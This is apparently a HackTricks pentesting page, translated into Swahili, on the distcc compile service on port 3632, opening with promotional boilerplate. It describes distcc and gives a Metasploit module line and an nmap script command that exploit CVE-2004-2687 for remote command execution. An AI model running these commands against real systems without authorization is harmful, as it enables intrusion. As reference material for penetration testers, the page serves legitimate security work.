hacktricks/network-services-pentesting/3632-pentesting-distcc.md

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

• Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
• Pata bidhaa rasmi za PEASS & HackTricks
• Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs za kipekee
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
• Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa Msingi

Distcc ni chombo kinachoboresha mchakato wa uundaji kwa kutumia nguvu za usindikaji zilizotulia za kompyuta nyingine kwenye mtandao. Wakati distcc inapowekwa kwenye mashine, mashine hii inaweza kusambaza kazi zake za uundaji kwa mfumo mwingine. Mfumo huu wa mpokeaji lazima uwe unatekeleza daemani ya distccd na lazima awe na kompaila inayoweza kufanya kazi imewekwa ili iprocess nambari iliyotumwa.

Bandari ya chaguo: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Utekaji

Angalia ikiwa ina hatari ya CVE-2004-2687 ya kutekeleza nambari za aina yoyote:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Sidhani shodan inagundua huduma hii.

Vyanzo

• https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
• https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

Mchapishaji: Álex B (@r1p)